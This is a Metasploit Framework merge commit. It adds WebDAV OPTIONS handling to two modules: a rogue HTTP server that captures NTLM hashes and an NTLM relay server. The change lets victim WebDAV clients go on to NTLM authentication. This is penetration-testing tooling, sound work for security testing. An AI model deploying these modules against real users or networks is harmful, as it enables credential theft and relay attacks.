Merge branch 'webdav_fix' of https://github.com/mubix/metasploit-framework into mubix-webdav_fix

sinn3r · sinn3r · commit 3036f7725d48 · 2012-08-24T11:18:50.000-05:00
diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb
@@ -67,23 +67,28 @@ def initialize(info = {})
 
 	def on_request_uri(cli, request)
 		print_status("Request '#{request.uri}'...")
-
-		# If the host has not started auth, send 401 authenticate with only the NTLM option
-		if(!request.headers['Authorization'])
-			response = create_response(401, "Unauthorized")
-			response.headers['WWW-Authenticate'] = "NTLM"
-			cli.send_response(response)
+		
+		case request.method
+		when 'OPTIONS'
+			process_options(cli, request)
 		else
-			method,hash = request.headers['Authorization'].split(/\s+/,2)
-			# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
-			if(method != "NTLM")
-				print_status("Unrecognized Authorization header, responding with 404")
-				send_not_found(cli)
-				return false
-			end
+			# If the host has not started auth, send 401 authenticate with only the NTLM option
+			if(!request.headers['Authorization'])
+				response = create_response(401, "Unauthorized")
+				response.headers['WWW-Authenticate'] = "NTLM"
+				cli.send_response(response)
+			else
+				method,hash = request.headers['Authorization'].split(/\s+/,2)
+				# If the method isn't NTLM something odd is goign on. Regardless, this won't get what we want, 404 them
+				if(method != "NTLM")
+					print_status("Unrecognized Authorization header, responding with 404")
+					send_not_found(cli)
+					return false
+				end
 
-			response = handle_auth(cli,hash)
-			cli.send_response(response)
+				response = handle_auth(cli,hash)
+				cli.send_response(response)
+			end
 		end
 	end
 
@@ -96,6 +101,23 @@ def run
 		end
 		exploit()
 	end
+	
+	def process_options(cli, request)
+		print_status("OPTIONS #{request.uri}")
+		headers = {
+			'MS-Author-Via' => 'DAV',
+			'DASL'          => '<DAV:sql>',
+			'DAV'           => '1, 2',
+			'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+			'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+			'Cache-Control' => 'private'
+		}
+		resp = create_response(207, "Multi-Status")
+		headers.each_pair {|k,v| resp[k] = v }
+		resp.body = ""
+		resp['Content-Type'] = 'text/xml'
+		cli.send_response(resp)
+	end
 
 	def handle_auth(cli,hash)
 		#authorization string is base64 encoded message
diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb
@@ -93,44 +93,66 @@ def initialize(info = {})
 
 	# Handles the initial requests waiting for the browser to try NTLM auth
 	def on_request_uri(cli, request)
+	
+		case request.method
+		when 'OPTIONS'
+			process_options(cli, request)
+		else
+			datastore['REQUEST_IP'] = cli.peerhost
+			cli.keepalive = true;
 
-		datastore['REQUEST_IP'] = cli.peerhost
-		cli.keepalive = true;
+			# If the host has not started auth, send 401 authenticate with only the NTLM option
+			if(!request.headers['Authorization'])
+				response = create_response(401, "Unauthorized")
+				response.headers['WWW-Authenticate'] = "NTLM"
+				response.headers['Proxy-Support'] = 'Session-Based-Authentication'
 
-		# If the host has not started auth, send 401 authenticate with only the NTLM option
-		if(!request.headers['Authorization'])
-			response = create_response(401, "Unauthorized")
-			response.headers['WWW-Authenticate'] = "NTLM"
-			response.headers['Proxy-Support'] = 'Session-Based-Authentication'
+				response.body =
+					"<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE></HEAD></HTML>"
 
-			response.body =
-				"<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE></HEAD></HTML>"
+				cli.send_response(response)
+				return false
+			end
+			method,hash = request.headers['Authorization'].split(/\s+/,2)
+			# If the method isn't NTLM something odd is goign on.
+			# Regardless, this won't get what we want, 404 them
+			if(method != "NTLM")
+				print_status("Unrecognized Authorization header, responding with 404")
+				send_not_found(cli)
+				return false
+			end
 
-			cli.send_response(response)
-			return false
-		end
-		method,hash = request.headers['Authorization'].split(/\s+/,2)
-		# If the method isn't NTLM something odd is goign on.
-		# Regardless, this won't get what we want, 404 them
-		if(method != "NTLM")
-			print_status("Unrecognized Authorization header, responding with 404")
-			send_not_found(cli)
-			return false
-		end
+			print_status("NTLM Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
 
-		print_status("NTLM Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
+			if (datastore['SYNCFILE'] != nil)
+				sync_options()
+			end
 
-		if (datastore['SYNCFILE'] != nil)
-			sync_options()
+			handle_relay(cli,hash)
 		end
-
-		handle_relay(cli,hash)
 	end
 
 	def run
 		parse_args()
 		exploit()
 	end
+	
+	def process_options(cli, request)
+		print_status("OPTIONS #{request.uri}")
+		headers = {
+			'MS-Author-Via' => 'DAV',
+			'DASL'          => '<DAV:sql>',
+			'DAV'           => '1, 2',
+			'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+			'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+			'Cache-Control' => 'private'
+		}
+		resp = create_response(207, "Multi-Status")
+		headers.each_pair {|k,v| resp[k] = v }
+		resp.body = ""
+		resp['Content-Type'] = 'text/xml'
+		cli.send_response(resp)
+	end
 
 	#The call to handle_relay should be a victim HTTP type 1 request
 	def handle_relay(cli_sock, hash)
